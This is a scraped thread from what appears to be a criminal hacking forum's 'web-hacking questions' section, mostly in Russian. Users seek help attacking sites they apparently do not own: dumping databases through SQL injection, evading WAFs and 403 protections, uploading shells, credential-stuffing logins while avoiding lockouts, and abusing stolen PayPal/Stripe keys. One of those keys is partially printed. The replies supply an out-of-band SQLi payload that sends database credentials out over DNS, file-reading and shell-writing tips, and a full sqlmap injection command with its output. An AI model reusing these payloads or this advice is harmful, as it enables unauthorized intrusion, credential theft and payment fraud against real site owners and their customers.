запусти в 50 потоков и будет идти минуту
количество максимальных потоков можно редактировать в settings.py
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
количество максимальных потоков можно редактировать в settings.py
Знаю, запускал в один и в 25 - все равно медленно. Не выдаёт дальше ничего в любом случае.
агрится на что то ваф. попробуй тамперы
Например?—tamper=space2comment? Просто по чувствам что вообще ничего не изменится. По факту дела он находит и бд и таблицы, но открыть таблицы не может просто из за названия глупого столбца
Кто может помочь применить данную уязвимость или наставить на правильный путь?
Lodash Other Vulnerability v3.10.1-3.10.1
Lodash Other Vulnerability v3.10.1-3.10.1
как быстро сдампить базу через TImed Based ?Если обычным способом может пройди месяц
Возможно ли проверить пачку доменов (разные движки) на LFI/Path Traversal? Есть ли какие то готовые инструменты для такого тестирования?
Подскажите как проверить очень много сайтов на трафик 20к сайтов надо примерно проверить
нужен способ хотя бы проверять разово по 100 сайтов на гео и количество трафика
нужен способ хотя бы проверять разово по 100 сайтов на гео и количество трафика
Bcem Privet
First ever question. Be kind
I have links to files on a Woocommerce site and since they are in /woocommerce_uploads/ directory they are protected by .htaccess giving me a 403 error. Is there a way bypass the 403 error ?
I have tried Bypass-403 script from Github , It does give me some 200 responses but I can't make to download in real life.
I was thinking something in wordpress would help me bypass this protection
Spacibo
First ever question. Be kind
I have links to files on a Woocommerce site and since they are in /woocommerce_uploads/ directory they are protected by .htaccess giving me a 403 error. Is there a way bypass the 403 error ?
I have tried Bypass-403 script from Github , It does give me some 200 responses but I can't make to download in real life.
I was thinking something in wordpress would help me bypass this protection
Spacibo
Лажу на разных не очень сайтах, с целью поиграться и набить скилл на SQLi
В итоге вроде всё получается, всё крутиться....
Решил пойти дальше и поиграться с шеллом, вот собственно вопрос - можно ли как то пролить шелл используя sqlmap, хотя везде права только USAGE ?
Спасибо
В итоге вроде всё получается, всё крутиться....
Решил пойти дальше и поиграться с шеллом, вот собственно вопрос - можно ли как то пролить шелл используя sqlmap, хотя везде права только USAGE ?
Спасибо
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/116915/
еще можешь попробовать api similarweb/semrush/ahrefs/moz
Anyone know good tools or techniques to bypass 403. I tried two on github.
try fuzzing, for example if /admin/ gives 403, try /admin/index.php
using ffuf and seclists
if you can execute the query on your target:
SELECT load_file(CONCAT('\\\\',(SELECT+@@version),'.',(SELECT+user),'.', (SELECT+password),'.',example.com\\test.txt'))This application will send a DNS request to the domain database_version.database_user.database_password.example.com
refrence: https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/
Мне нужна помощь разностороннего специалиста)
Моя задача войти на сайт с использованием логина и пароля, но сайт просто так не пропустит, если у тебя есть данные, он может заблокировать аккаунт. Для попытки решения проблемы пробовал разные способы: разные прокси, разные антидетект браузеры, подбор юзер агента, но так и не нашел какого-то четкого понимания, почему блокируется аккаунт. Могу ввести 10 логов и не будет блокировки аккаунтов, а потом 10 подряд аккаунтов заблокируют
Может кто-то знает решение или может мне помочь?
Моя задача войти на сайт с использованием логина и пароля, но сайт просто так не пропустит, если у тебя есть данные, он может заблокировать аккаунт. Для попытки решения проблемы пробовал разные способы: разные прокси, разные антидетект браузеры, подбор юзер агента, но так и не нашел какого-то четкого понимания, почему блокируется аккаунт. Могу ввести 10 логов и не будет блокировки аккаунтов, а потом 10 подряд аккаунтов заблокируют
Может кто-то знает решение или может мне помочь?
Hard to narrow down with out pcap/har file or knowing more about the victim/target demographic. Are you entering the network or just web?
If you have a Web stores paypal and stripe keys. What can you do with them
production: 'ATaF6yqGQJBA0D1Ma55QAcG3-XXR0zlrhnfYZIWaS3rPhA....
production: 'ATaF6yqGQJBA0D1Ma55QAcG3-XXR0zlrhnfYZIWaS3rPhA....
Есть пароль от бд. есть скуля которая ведет в нужную дб (естественно в локалхосте). Есть логин от бд, сама база содержит какие то пароли и хэши но в целом особо от них проку нет.
База mysql >=4.1 как говорит мне скульмап. Вопрос, можно ли зная рут пароль от бд и логин да и вообще все (кроме нужной мне таблицы wp_users), ссрфнуть куда-нибудь в сервер? file-read не читает, ну или я пока директорий не знаю. В идеале бы вообще шелл закинуть, но file-write не отрабатывает.
Привилегии при инъекции рутовые
База mysql >=4.1 как говорит мне скульмап. Вопрос, можно ли зная рут пароль от бд и логин да и вообще все (кроме нужной мне таблицы wp_users), ссрфнуть куда-нибудь в сервер? file-read не читает, ну или я пока директорий не знаю. В идеале бы вообще шелл закинуть, но file-write не отрабатывает.
Привилегии при инъекции рутовые
Последнее редактирование:
Проверяли права на запись у пользователя в таблице mysql?
Всегда можно не зная полного пути, прочитать конфигурационный файлы веб серверов, посмотреть логи и так далее (есть в интернете словари, которые можно пофазить).
Получив путь, уже можно пробовать делать запись в папку где есть на это права, для начала можно проверить записать в /tmp или /dev/shm/ и потом прочитать от туда.
Можно еще пробовать подключиться удаленно к бд (очень редко), но бывает такую возможность оставляют.
sqlmap -u "https://example.com/wp-json/ex/sign-in" --data="email=testing%40example.com&post_id=-1'%20OR%203*2*1=6%20AND%20000205=000205%20--%20&" --random-agent v3 --batch -D 2BASE -T WwW --dump --threads=5 --hex
[04:45:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:45:31] [INFO] fetching columns for table 'WwW' in database '2BASE'
[04:45:35] [INFO] resumed: 0
[04:45:35] [ERROR] unable to retrieve the number of columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] unable to retrieve column names for table 'WwW' in database '2BASE'
do you want to use common column existence check? [y/N/q] N
[04:45:35] [WARNING] unable to enumerate the columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] HTTP error codes detected during run:
422 (Unprocessable Entity) - 2 times
[04:45:35] [INFO] fetched data logged to text files under '/home/rer/.local/share/sqlmap/output/example.com'
[*] ending @ 04:45:35 /2024-08-31/
не дампит. пробовал --no-cast и --hex
[04:45:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:45:31] [INFO] fetching columns for table 'WwW' in database '2BASE'
[04:45:35] [INFO] resumed: 0
[04:45:35] [ERROR] unable to retrieve the number of columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] unable to retrieve column names for table 'WwW' in database '2BASE'
do you want to use common column existence check? [y/N/q] N
[04:45:35] [WARNING] unable to enumerate the columns for table 'WwW' in database '2BASE'
[04:45:35] [WARNING] HTTP error codes detected during run:
422 (Unprocessable Entity) - 2 times
[04:45:35] [INFO] fetched data logged to text files under '/home/rer/.local/share/sqlmap/output/example.com'
[*] ending @ 04:45:35 /2024-08-31/
не дампит. пробовал --no-cast и --hex